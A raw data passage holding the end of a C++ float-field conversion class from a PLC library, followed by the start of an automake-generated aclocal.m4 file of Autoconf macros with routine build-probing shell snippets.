===================================================\n\t\t\t\t\t\t\tlong DefaultFloatFieldItem::getLong(int index)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tif (!isValidLong(index))\n\t\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\t\tthrow new PlcIncompatibleDatatypeException(\"long\", index);\n\t\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t\treturn (long)getValue(index);\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t// ===================================================\n\t\t\t\t\t\t\tbool DefaultFloatFieldItem::isValidBigInteger(int 
index)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\treturn true;\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t// ===================================================\n\t\t\t\t\t\t\tlong long DefaultFloatFieldItem::getBigInteger(int index)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tif (!isValidBigInteger(index))\n\t\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\t\tthrow new PlcIncompatibleDatatypeException(\"long long\", index);\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t// Todo: add conversion from cpp_dec_float_100 TO long long\n\t\t\t\t\t\t\t\treturn (long)getValue(index);\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t// ===================================================\n\t\t\t\t\t\t\tbool DefaultFloatFieldItem::isValidFloat(int index)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tfloat value = getValue(index);\n\t\t\t\t\t\t\t\treturn value >= -3.4e38 && value <= 3.4e38;\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t// ===================================================\n\t\t\t\t\t\t\tfloat DefaultFloatFieldItem::getFloat(int index)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tif (!isValidFloat(index))\n\t\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\t\tthrow new PlcIncompatibleDatatypeException(\"float\", index);\n\t\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t\treturn (float)getValue(index);\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t// ===================================================\n\t\t\t\t\t\t\tbool DefaultFloatFieldItem::isValidDouble(int index)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tdouble value = getValue(index);\n\t\t\t\t\t\t\t\treturn value >= -1.7e308 && value <= 1.7e308;\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t// ===================================================\n\t\t\t\t\t\t\tdouble DefaultFloatFieldItem::getDouble(int index)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tif (!isValidDouble(index))\n\t\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\t\tthrow new PlcIncompatibleDatatypeException(\"double\", index);\n\t\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t\treturn (double)getValue(index);\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t// ===================================================\n\t\t\t\t\t\t\tbool DefaultFloatFieldItem::isValidBigDecimal(int index)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\t// same limits but higher precision\n\t\t\t\t\t\t\t\treturn isValidDouble(index);\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t// ===================================================\n\t\t\t\t\t\t\tcpp_dec_float_100 DefaultFloatFieldItem::getBigDecimal(int index)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tif (!isValidBigDecimal(index))\n\t\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\t\tthrow new PlcIncompatibleDatatypeException(\"cpp_dec_float_100\", index);\n\t\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t\treturn (cpp_dec_float_100)getValue(index);\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t\t\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n}\n"} {"text": "# generated automatically by aclocal 1.11.6 -*- Autoconf -*-\n\n# Copyright (C) 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003, 2004,\n# 2005, 2006, 2007, 2008, 2009, 2010, 2011 Free Software Foundation,\n# Inc.\n# This file is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY, to the extent permitted by law; without\n# even the implied warranty of MERCHANTABILITY or FITNESS FOR A\n# PARTICULAR PURPOSE.\n\nm4_ifndef([AC_AUTOCONF_VERSION],\n [m4_copy([m4_PACKAGE_VERSION], [AC_AUTOCONF_VERSION])])dnl\nm4_if(m4_defn([AC_AUTOCONF_VERSION]), [2.68],,\n[m4_warning([this file was generated for autoconf 2.68.\nYou have another version 
of autoconf. It may work, but is not guaranteed to.\nIf you have problems, you may need to regenerate the build system entirely.\nTo do so, use the procedure documented by the package, typically `autoreconf'.])])\n\n# Copyright (C) 2002, 2003, 2005, 2006, 2007, 2008, 2011 Free Software\n# Foundation, Inc.\n#\n# This file is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# serial 1\n\n# AM_AUTOMAKE_VERSION(VERSION)\n# ----------------------------\n# Automake X.Y traces this macro to ensure aclocal.m4 has been\n# generated from the m4 files accompanying Automake X.Y.\n# (This private macro should not be called outside this file.)\nAC_DEFUN([AM_AUTOMAKE_VERSION],\n[am__api_version='1.11'\ndnl Some users find AM_AUTOMAKE_VERSION and mistake it for a way to\ndnl require some minimum version. Point them to the right macro.\nm4_if([$1], [1.11.6], [],\n [AC_FATAL([Do not call $0, use AM_INIT_AUTOMAKE([$1]).])])dnl\n])\n\n# _AM_AUTOCONF_VERSION(VERSION)\n# -----------------------------\n# aclocal traces this macro to find the Autoconf version.\n# This is a private macro too. Using m4_define simplifies\n# the logic in aclocal, which can simply ignore this definition.\nm4_define([_AM_AUTOCONF_VERSION], [])\n\n# AM_SET_CURRENT_AUTOMAKE_VERSION\n# -------------------------------\n# Call AM_AUTOMAKE_VERSION and AM_AUTOMAKE_VERSION so they can be traced.\n# This function is AC_REQUIREd by AM_INIT_AUTOMAKE.\nAC_DEFUN([AM_SET_CURRENT_AUTOMAKE_VERSION],\n[AM_AUTOMAKE_VERSION([1.11.6])dnl\nm4_ifndef([AC_AUTOCONF_VERSION],\n [m4_copy([m4_PACKAGE_VERSION], [AC_AUTOCONF_VERSION])])dnl\n_AM_AUTOCONF_VERSION(m4_defn([AC_AUTOCONF_VERSION]))])\n\n# AM_AUX_DIR_EXPAND -*- Autoconf -*-\n\n# Copyright (C) 2001, 2003, 2005, 2011 Free Software Foundation, Inc.\n#\n# This file is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# serial 1\n\n# For projects using AC_CONFIG_AUX_DIR([foo]), Autoconf sets\n# $ac_aux_dir to `$srcdir/foo'. In other projects, it is set to\n# `$srcdir', `$srcdir/..', or `$srcdir/../..'.\n#\n# Of course, Automake must honor this variable whenever it calls a\n# tool from the auxiliary directory. The problem is that $srcdir (and\n# therefore $ac_aux_dir as well) can be either absolute or relative,\n# depending on how configure is run. This is pretty annoying, since\n# it makes $ac_aux_dir quite unusable in subdirectories: in the top\n# source directory, any form will work fine, but in subdirectories a\n# relative path needs to be adjusted first.\n#\n# $ac_aux_dir/missing\n# fails when called from a subdirectory if $ac_aux_dir is relative\n# $top_srcdir/$ac_aux_dir/missing\n# fails if $ac_aux_dir is absolute,\n# fails when called from a subdirectory in a VPATH build with\n# a relative $ac_aux_dir\n#\n# The reason of the latter failure is that $top_srcdir and $ac_aux_dir\n# are both prefixed by $srcdir. In an in-source build this is usually\n# harmless because $srcdir is `.', but things will broke when you\n# start a VPATH build or use an absolute $srcdir.\n#\n# So we could use something similar to $top_srcdir/$ac_aux_dir/missing,\n# iff we strip the leading $srcdir from $ac_aux_dir. 
That would be:\n# am_aux_dir='\\$(top_srcdir)/'`expr \"$ac_aux_dir\" : \"$srcdir//*\\(.*\\)\"`\n# and then we would define $MISSING as\n# MISSING=\"\\${SHELL} $am_aux_dir/missing\"\n# This will work as long as MISSING is not called from configure, because\n# unfortunately $(top_srcdir) has no meaning in configure.\n# However there are other variables, like CC, which are often used in\n# configure, and could therefore not use this \"fixed\" $ac_aux_dir.\n#\n# Another solution, used here, is to always expand $ac_aux_dir to an\n# absolute PATH. The drawback is that using absolute paths prevent a\n# configured tree to be moved without reconfiguration.\n\nAC_DEFUN([AM_AUX_DIR_EXPAND],\n[dnl Rely on autoconf to set up CDPATH properly.\nAC_PREREQ([2.50])dnl\n# expand $ac_aux_dir to an absolute path\nam_aux_dir=`cd $ac_aux_dir && pwd`\n])\n\n# AM_CONDITIONAL -*- Autoconf -*-\n\n# Copyright (C) 1997, 2000, 2001, 2003, 2004, 2005, 2006, 2008\n# Free Software Foundation, Inc.\n#\n# This file is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# serial 9\n\n# AM_CONDITIONAL(NAME, SHELL-CONDITION)\n# -------------------------------------\n# Define a conditional.\nAC_DEFUN([AM_CONDITIONAL],\n[AC_PREREQ(2.52)dnl\n ifelse([$1], [TRUE], [AC_FATAL([$0: invalid condition: $1])],\n\t[$1], [FALSE], [AC_FATAL([$0: invalid condition: $1])])dnl\nAC_SUBST([$1_TRUE])dnl\nAC_SUBST([$1_FALSE])dnl\n_AM_SUBST_NOTMAKE([$1_TRUE])dnl\n_AM_SUBST_NOTMAKE([$1_FALSE])dnl\nm4_define([_AM_COND_VALUE_$1], [$2])dnl\nif $2; then\n $1_TRUE=\n $1_FALSE='#'\nelse\n $1_TRUE='#'\n $1_FALSE=\nfi\nAC_CONFIG_COMMANDS_PRE(\n[if test -z \"${$1_TRUE}\" && test -z \"${$1_FALSE}\"; then\n AC_MSG_ERROR([[conditional \"$1\" was never defined.\nUsually this means the macro was only invoked conditionally.]])\nfi])])\n\n# Copyright (C) 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2009,\n# 2010, 2011 Free Software Foundation, Inc.\n#\n# This file is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# serial 12\n\n# There are a few dirty hacks below to avoid letting `AC_PROG_CC' be\n# written in clear, in which case automake, when reading aclocal.m4,\n# will think it sees a *use*, and therefore will trigger all it's\n# C support machinery. Also note that it means that autoscan, seeing\n# CC etc. 
in the Makefile, will ask for an AC_PROG_CC use...\n\n\n# _AM_DEPENDENCIES(NAME)\n# ----------------------\n# See how the compiler implements dependency checking.\n# NAME is \"CC\", \"CXX\", \"GCJ\", or \"OBJC\".\n# We try a few techniques and use that to set a single cache variable.\n#\n# We don't AC_REQUIRE the corresponding AC_PROG_CC since the latter was\n# modified to invoke _AM_DEPENDENCIES(CC); we would have a circular\n# dependency, and given that the user is not expected to run this macro,\n# just rely on AC_PROG_CC.\nAC_DEFUN([_AM_DEPENDENCIES],\n[AC_REQUIRE([AM_SET_DEPDIR])dnl\nAC_REQUIRE([AM_OUTPUT_DEPENDENCY_COMMANDS])dnl\nAC_REQUIRE([AM_MAKE_INCLUDE])dnl\nAC_REQUIRE([AM_DEP_TRACK])dnl\n\nifelse([$1], CC, [depcc=\"$CC\" am_compiler_list=],\n [$1], CXX, [depcc=\"$CXX\" am_compiler_list=],\n [$1], OBJC, [depcc=\"$OBJC\" am_compiler_list='gcc3 gcc'],\n [$1], UPC, [depcc=\"$UPC\" am_compiler_list=],\n [$1], GCJ, [depcc=\"$GCJ\" am_compiler_list='gcc3 gcc'],\n [depcc=\"$$1\" am_compiler_list=])\n\nAC_CACHE_CHECK([dependency style of $depcc],\n [am_cv_$1_dependencies_compiler_type],\n[if test -z \"$AMDEP_TRUE\" && test -f \"$am_depcomp\"; then\n # We make a subdir and do the tests there. Otherwise we can end up\n # making bogus files that we don't know about and never remove. For\n # instance it was reported that on HP-UX the gcc test will end up\n # making a dummy file named `D' -- because `-MD' means `put the output\n # in D'.\n rm -rf conftest.dir\n mkdir conftest.dir\n # Copy depcomp to subdir because otherwise we won't find it if we're\n # using a relative directory.\n cp \"$am_depcomp\" conftest.dir\n cd conftest.dir\n # We will build objects and dependencies in a subdirectory because\n # it helps to detect inapplicable dependency modes. For instance\n # both Tru64's cc and ICC support -MD to output dependencies as a\n # side effect of compilation, but ICC will put the dependencies in\n # the current directory while Tru64 will put them in the object\n # directory.\n mkdir sub\n\n am_cv_$1_dependencies_compiler_type=none\n if test \"$am_compiler_list\" = \"\"; then\n am_compiler_list=`sed -n ['s/^#*\\([a-zA-Z0-9]*\\))$/\\1/p'] < ./depcomp`\n fi\n am__universal=false\n m4_case([$1], [CC],\n [case \" $depcc \" in #(\n *\\ -arch\\ *\\ -arch\\ *) am__universal=true ;;\n esac],\n [CXX],\n [case \" $depcc \" in #(\n *\\ -arch\\ *\\ -arch\\ *) am__universal=true ;;\n esac])\n\n for depmode in $am_compiler_list; do\n # Setup a source with many dependencies, because some compilers\n # like to wrap large dependency lists on column 80 (with \\), and\n # we should not choose a depcomp mode which is confused by this.\n #\n # We need to recreate these files for each test, as the compiler may\n # overwrite some of them when testing with obscure command lines.\n # This happens at least with the AIX C compiler.\n : > sub/conftest.c\n for i in 1 2 3 4 5 6; do\n echo '#include \"conftst'$i'.h\"' >> sub/conftest.c\n # Using `: > sub/conftst$i.h' creates only sub/conftst1.h with\n # Solaris 8's {/usr,}/bin/sh.\n touch sub/conftst$i.h\n done\n echo \"${am__include} ${am__quote}sub/conftest.Po${am__quote}\" > confmf\n\n # We check with `-c' and `-o' for the sake of the \"dashmstdout\"\n # mode. It turns out that the SunPro C++ compiler does not properly\n # handle `-M -o', and we need to detect this. 
Also, some Intel\n # versions had trouble with output in subdirs\n am__obj=sub/conftest.${OBJEXT-o}\n am__minus_obj=\"-o $am__obj\"\n case $depmode in\n gcc)\n # This depmode causes a compiler race in universal mode.\n test \"$am__universal\" = false || continue\n ;;\n nosideeffect)\n # after this tag, mechanisms are not by side-effect, so they'll\n # only be used when explicitly requested\n if test \"x$enable_dependency_tracking\" = xyes; then\n\tcontinue\n else\n\tbreak\n fi\n ;;\n msvc7 | msvc7msys | msvisualcpp | msvcmsys)\n # This compiler won't grok `-c -o', but also, the minuso test has\n # not run yet. These depmodes are late enough in the game, and\n # so weak that their functioning should not be impacted.\n am__obj=conftest.${OBJEXT-o}\n am__minus_obj=\n ;;\n none) break ;;\n esac\n if depmode=$depmode \\\n source=sub/conftest.c object=$am__obj \\\n depfile=sub/conftest.Po tmpdepfile=sub/conftest.TPo \\\n $SHELL ./depcomp $depcc -c $am__minus_obj sub/conftest.c \\\n >/dev/null 2>conftest.err &&\n grep sub/conftst1.h sub/conftest.Po > /dev/null 2>&1 &&\n grep sub/conftst6.h sub/conftest.Po > /dev/null 2>&1 &&\n grep $am__obj sub/conftest.Po > /dev/null 2>&1 &&\n ${MAKE-make} -s -f confmf > /dev/null 2>&1; then\n # icc doesn't choke on unknown options, it will just issue warnings\n # or remarks (even with -Werror). So we grep stderr for any message\n # that says an option was ignored or not supported.\n # When given -MP, icc 7.0 and 7.1 complain thusly:\n # icc: Command line warning: ignoring option '-M'; no argument required\n # The diagnosis changed in icc 8.0:\n # icc: Command line remark: option '-MP' not supported\n if (grep 'ignoring option' conftest.err ||\n grep 'not supported' conftest.err) >/dev/null 2>&1; then :; else\n am_cv_$1_dependencies_compiler_type=$depmode\n break\n fi\n fi\n done\n\n cd ..\n rm -rf conftest.dir\nelse\n am_cv_$1_dependencies_compiler_type=none\nfi\n])\nAC_SUBST([$1DEPMODE], [depmode=$am_cv_$1_dependencies_compiler_type])\nAM_CONDITIONAL([am__fastdep$1], [\n test \"x$enable_dependency_tracking\" != xno \\\n && test \"$am_cv_$1_dependencies_compiler_type\" = gcc3])\n])\n\n\n# AM_SET_DEPDIR\n# -------------\n# Choose a directory name for dependency files.\n# This macro is AC_REQUIREd in _AM_DEPENDENCIES\nAC_DEFUN([AM_SET_DEPDIR],\n[AC_REQUIRE([AM_SET_LEADING_DOT])dnl\nAC_SUBST([DEPDIR], [\"${am__leading_dot}deps\"])dnl\n])\n\n\n# AM_DEP_TRACK\n# ------------\nAC_DEFUN([AM_DEP_TRACK],\n[AC_ARG_ENABLE(dependency-tracking,\n[ --disable-dependency-tracking speeds up one-time build\n --enable-dependency-tracking do not reject slow dependency extractors])\nif test \"x$enable_dependency_tracking\" != xno; then\n am_depcomp=\"$ac_aux_dir/depcomp\"\n AMDEPBACKSLASH='\\'\n am__nodep='_no'\nfi\nAM_CONDITIONAL([AMDEP], [test \"x$enable_dependency_tracking\" != xno])\nAC_SUBST([AMDEPBACKSLASH])dnl\n_AM_SUBST_NOTMAKE([AMDEPBACKSLASH])dnl\nAC_SUBST([am__nodep])dnl\n_AM_SUBST_NOTMAKE([am__nodep])dnl\n])\n\n# Generate code to set up dependency tracking. 
-*- Autoconf -*-\n\n# Copyright (C) 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2008\n# Free Software Foundation, Inc.\n#\n# This file is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n#serial 5\n\n# _AM_OUTPUT_DEPENDENCY_COMMANDS\n# ------------------------------\nAC_DEFUN([_AM_OUTPUT_DEPENDENCY_COMMANDS],\n[{\n # Autoconf 2.62 quotes --file arguments for eval, but not when files\n # are listed without --file. Let's play safe and only enable the eval\n # if we detect the quoting.\n case $CONFIG_FILES in\n *\\'*) eval set x \"$CONFIG_FILES\" ;;\n *) set x $CONFIG_FILES ;;\n esac\n shift\n for mf\n do\n # Strip MF so we end up with the name of the file.\n mf=`echo \"$mf\" | sed -e 's/:.*$//'`\n # Check whether this is an Automake generated Makefile or not.\n # We used to match only the files named `Makefile.in', but\n # some people rename them; so instead we look at the file content.\n # Grep'ing the first line is not enough: some people post-process\n # each Makefile.in and add a new line on top of each file to say so.\n # Grep'ing the whole file is not good either: AIX grep has a line\n # limit of 2048, but all sed's we know have understand at least 4000.\n if sed -n 's,^#.*generated by automake.*,X,p' \"$mf\" | grep X >/dev/null 2>&1; then\n dirpart=`AS_DIRNAME(\"$mf\")`\n else\n continue\n fi\n # Extract the definition of DEPDIR, am__include, and am__quote\n # from the Makefile without running `make'.\n DEPDIR=`sed -n 's/^DEPDIR = //p' < \"$mf\"`\n test -z \"$DEPDIR\" && continue\n am__include=`sed -n 's/^am__include = //p' < \"$mf\"`\n test -z \"am__include\" && continue\n am__quote=`sed -n 's/^am__quote = //p' < \"$mf\"`\n # When using ansi2knr, U may be empty or an underscore; expand it\n U=`sed -n 's/^U = //p' < \"$mf\"`\n # Find all dependency output files, they are included files with\n # $(DEPDIR) in their names. We invoke sed twice because it is the\n # simplest approach to changing $(DEPDIR) to its actual value in the\n # expansion.\n for file in `sed -n \"\n s/^$am__include $am__quote\\(.*(DEPDIR).*\\)$am__quote\"'$/\\1/p' <\"$mf\" | \\\n\t sed -e 's/\\$(DEPDIR)/'\"$DEPDIR\"'/g' -e 's/\\$U/'\"$U\"'/g'`; do\n # Make sure the directory exists.\n test -f \"$dirpart/$file\" && continue\n fdir=`AS_DIRNAME([\"$file\"])`\n AS_MKDIR_P([$dirpart/$fdir])\n # echo \"creating $dirpart/$file\"\n echo '# dummy' > \"$dirpart/$file\"\n done\n done\n}\n])# _AM_OUTPUT_DEPENDENCY_COMMANDS\n\n\n# AM_OUTPUT_DEPENDENCY_COMMANDS\n# -----------------------------\n# This macro should only be invoked once -- use via AC_REQUIRE.\n#\n# This code is only required when automatic dependency tracking\n# is enabled. FIXME. This creates each `.P' file that we will\n# need in order to bootstrap the dependency handling code.\nAC_DEFUN([AM_OUTPUT_DEPENDENCY_COMMANDS],\n[AC_CONFIG_COMMANDS([depfiles],\n [test x\"$AMDEP_TRUE\" != x\"\" || _AM_OUTPUT_DEPENDENCY_COMMANDS],\n [AMDEP_TRUE=\"$AMDEP_TRUE\" ac_aux_dir=\"$ac_aux_dir\"])\n])\n\n# Do all the work for Automake. -*- Autoconf -*-\n\n# Copyright (C) 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003, 2004,\n# 2005, 2006, 2008, 2009 Free Software Foundation, Inc.\n#\n# This file is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# serial 16\n\n# This macro actually does too much. 
Some checks are only needed if\n# your package does certain things. But this isn't really a big deal.\n\n# AM_INIT_AUTOMAKE(PACKAGE, VERSION, [NO-DEFINE])\n# AM_INIT_AUTOMAKE([OPTIONS])\n# -----------------------------------------------\n# The call with PACKAGE and VERSION arguments is the old style\n# call (pre autoconf-2.50), which is being phased out. PACKAGE\n# and VERSION should now be passed to AC_INIT and removed from\n# the call to AM_INIT_AUTOMAKE.\n# We support both call styles for the transition. After\n# the next Automake release, Autoconf can make the AC_INIT\n# arguments mandatory, and then we can depend on a new Autoconf\n# release and drop the old call support.\nAC_DEFUN([AM_INIT_AUTOMAKE],\n[AC_PREREQ([2.62])dnl\ndnl Autoconf wants to disallow AM_ names. We explicitly allow\ndnl the ones we care about.\nm4_pattern_allow([^AM_[A-Z]+FLAGS$])dnl\nAC_REQUIRE([AM_SET_CURRENT_AUTOMAKE_VERSION])dnl\nAC_REQUIRE([AC_PROG_INSTALL])dnl\nif test \"`cd $srcdir && pwd`\" != \"`pwd`\"; then\n # Use -I$(srcdir) only when $(srcdir) != ., so that make's output\n # is not polluted with repeated \"-I.\"\n AC_SUBST([am__isrc], [' -I$(srcdir)'])_AM_SUBST_NOTMAKE([am__isrc])dnl\n # test to see if srcdir already configured\n if test -f $srcdir/config.status; then\n AC_MSG_ERROR([source directory already configured; run \"make distclean\" there first])\n fi\nfi\n\n# test whether we have cygpath\nif test -z \"$CYGPATH_W\"; then\n if (cygpath --version) >/dev/null 2>/dev/null; then\n CYGPATH_W='cygpath -w'\n else\n CYGPATH_W=echo\n fi\nfi\nAC_SUBST([CYGPATH_W])\n\n# Define the identity of the package.\ndnl Distinguish between old-style and new-style calls.\nm4_ifval([$2],\n[m4_ifval([$3], [_AM_SET_OPTION([no-define])])dnl\n AC_SUBST([PACKAGE], [$1])dnl\n AC_SUBST([VERSION], [$2])],\n[_AM_SET_OPTIONS([$1])dnl\ndnl Diagnose old-style AC_INIT with new-style AM_AUTOMAKE_INIT.\nm4_if(m4_ifdef([AC_PACKAGE_NAME], 1)m4_ifdef([AC_PACKAGE_VERSION], 1), 11,,\n [m4_fatal([AC_INIT should be called with package and version arguments])])dnl\n AC_SUBST([PACKAGE], ['AC_PACKAGE_TARNAME'])dnl\n AC_SUBST([VERSION], ['AC_PACKAGE_VERSION'])])dnl\n\n_AM_IF_OPTION([no-define],,\n[AC_DEFINE_UNQUOTED(PACKAGE, \"$PACKAGE\", [Name of package])\n AC_DEFINE_UNQUOTED(VERSION, \"$VERSION\", [Version number of package])])dnl\n\n# Some tools Automake needs.\nAC_REQUIRE([AM_SANITY_CHECK])dnl\nAC_REQUIRE([AC_ARG_PROGRAM])dnl\nAM_MISSING_PROG(ACLOCAL, aclocal-${am__api_version})\nAM_MISSING_PROG(AUTOCONF, autoconf)\nAM_MISSING_PROG(AUTOMAKE, automake-${am__api_version})\nAM_MISSING_PROG(AUTOHEADER, autoheader)\nAM_MISSING_PROG(MAKEINFO, makeinfo)\nAC_REQUIRE([AM_PROG_INSTALL_SH])dnl\nAC_REQUIRE([AM_PROG_INSTALL_STRIP])dnl\nAC_REQUIRE([AM_PROG_MKDIR_P])dnl\n# We need awk for the \"check\" target. 
The system \"awk\" is bad on\n# some platforms.\nAC_REQUIRE([AC_PROG_AWK])dnl\nAC_REQUIRE([AC_PROG_MAKE_SET])dnl\nAC_REQUIRE([AM_SET_LEADING_DOT])dnl\n_AM_IF_OPTION([tar-ustar], [_AM_PROG_TAR([ustar])],\n\t [_AM_IF_OPTION([tar-pax], [_AM_PROG_TAR([pax])],\n\t\t\t [_AM_PROG_TAR([v7])])])\n_AM_IF_OPTION([no-dependencies],,\n[AC_PROVIDE_IFELSE([AC_PROG_CC],\n\t\t [_AM_DEPENDENCIES(CC)],\n\t\t [define([AC_PROG_CC],\n\t\t\t defn([AC_PROG_CC])[_AM_DEPENDENCIES(CC)])])dnl\nAC_PROVIDE_IFELSE([AC_PROG_CXX],\n\t\t [_AM_DEPENDENCIES(CXX)],\n\t\t [define([AC_PROG_CXX],\n\t\t\t defn([AC_PROG_CXX])[_AM_DEPENDENCIES(CXX)])])dnl\nAC_PROVIDE_IFELSE([AC_PROG_OBJC],\n\t\t [_AM_DEPENDENCIES(OBJC)],\n\t\t [define([AC_PROG_OBJC],\n\t\t\t defn([AC_PROG_OBJC])[_AM_DEPENDENCIES(OBJC)])])dnl\n])\n_AM_IF_OPTION([silent-rules], [AC_REQUIRE([AM_SILENT_RULES])])dnl\ndnl The `parallel-tests' driver may need to know about EXEEXT, so add the\ndnl `am__EXEEXT' conditional if _AM_COMPILER_EXEEXT was seen. This macro\ndnl is hooked onto _AC_COMPILER_EXEEXT early, see below.\nAC_CONFIG_COMMANDS_PRE(dnl\n[m4_provide_if([_AM_COMPILER_EXEEXT],\n [AM_CONDITIONAL([am__EXEEXT], [test -n \"$EXEEXT\"])])])dnl\n])\n\ndnl Hook into `_AC_COMPILER_EXEEXT' early to learn its expansion. Do not\ndnl add the conditional right here, as _AC_COMPILER_EXEEXT may be further\ndnl mangled by Autoconf and run in a shell conditional statement.\nm4_define([_AC_COMPILER_EXEEXT],\nm4_defn([_AC_COMPILER_EXEEXT])[m4_provide([_AM_COMPILER_EXEEXT])])\n\n\n# When config.status generates a header, we must update the stamp-h file.\n# This file resides in the same directory as the config header\n# that is generated. The stamp files are numbered to have different names.\n\n# Autoconf calls _AC_AM_CONFIG_HEADER_HOOK (when defined) in the\n# loop where config.status creates the headers, so we can generate\n# our stamp files there.\nAC_DEFUN([_AC_AM_CONFIG_HEADER_HOOK],\n[# Compute $1's index in $config_headers.\n_am_arg=$1\n_am_stamp_count=1\nfor _am_header in $config_headers :; do\n case $_am_header in\n $_am_arg | $_am_arg:* )\n break ;;\n * )\n _am_stamp_count=`expr $_am_stamp_count + 1` ;;\n esac\ndone\necho \"timestamp for $_am_arg\" >`AS_DIRNAME([\"$_am_arg\"])`/stamp-h[]$_am_stamp_count])\n\n# Copyright (C) 2001, 2003, 2005, 2008, 2011 Free Software Foundation,\n# Inc.\n#\n# This file is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# serial 1\n\n# AM_PROG_INSTALL_SH\n# ------------------\n# Define $install_sh.\nAC_DEFUN([AM_PROG_INSTALL_SH],\n[AC_REQUIRE([AM_AUX_DIR_EXPAND])dnl\nif test x\"${install_sh}\" != xset; then\n case $am_aux_dir in\n *\\ * | *\\\t*)\n install_sh=\"\\${SHELL} '$am_aux_dir/install-sh'\" ;;\n *)\n install_sh=\"\\${SHELL} $am_aux_dir/install-sh\"\n esac\nfi\nAC_SUBST(install_sh)])\n\n# Copyright (C) 2003, 2005 Free Software Foundation, Inc.\n#\n# This file is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# serial 2\n\n# Check whether the underlying file-system supports filenames\n# with a leading dot. 
For instance MS-DOS doesn't.\nAC_DEFUN([AM_SET_LEADING_DOT],\n[rm -rf .tst 2>/dev/null\nmkdir .tst 2>/dev/null\nif test -d .tst; then\n am__leading_dot=.\nelse\n am__leading_dot=_\nfi\nrmdir .tst 2>/dev/null\nAC_SUBST([am__leading_dot])])\n\n# Add --enable-maintainer-mode option to configure. -*- Autoconf -*-\n# From Jim Meyering\n\n# Copyright (C) 1996, 1998, 2000, 2001, 2002, 2003, 2004, 2005, 2008,\n# 2011 Free Software Foundation, Inc.\n#\n# This file is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# serial 5\n\n# AM_MAINTAINER_MODE([DEFAULT-MODE])\n# ----------------------------------\n# Control maintainer-specific portions of Makefiles.\n# Default is to disable them, unless `enable' is passed literally.\n# For symmetry, `disable' may be passed as well. Anyway, the user\n# can override the default with the --enable/--disable switch.\nAC_DEFUN([AM_MAINTAINER_MODE],\n[m4_case(m4_default([$1], [disable]),\n [enable], [m4_define([am_maintainer_other], [disable])],\n [disable], [m4_define([am_maintainer_other], [enable])],\n [m4_define([am_maintainer_other], [enable])\n m4_warn([syntax], [unexpected argument to AM@&t@_MAINTAINER_MODE: $1])])\nAC_MSG_CHECKING([whether to enable maintainer-specific portions of Makefiles])\n dnl maintainer-mode's default is 'disable' unless 'enable' is passed\n AC_ARG_ENABLE([maintainer-mode],\n[ --][am_maintainer_other][-maintainer-mode am_maintainer_other make rules and dependencies not useful\n\t\t\t (and sometimes confusing) to the casual installer],\n [USE_MAINTAINER_MODE=$enableval],\n [USE_MAINTAINER_MODE=]m4_if(am_maintainer_other, [enable], [no], [yes]))\n AC_MSG_RESULT([$USE_MAINTAINER_MODE])\n AM_CONDITIONAL([MAINTAINER_MODE], [test $USE_MAINTAINER_MODE = yes])\n MAINT=$MAINTAINER_MODE_TRUE\n AC_SUBST([MAINT])dnl\n]\n)\n\nAU_DEFUN([jm_MAINTAINER_MODE], [AM_MAINTAINER_MODE])\n\n# Check to see how 'make' treats includes.\t -*- Autoconf -*-\n\n# Copyright (C) 2001, 2002, 2003, 2005, 2009 Free Software Foundation, Inc.\n#\n# This file is free software; the Free Software Foundation\n# gives unlimited 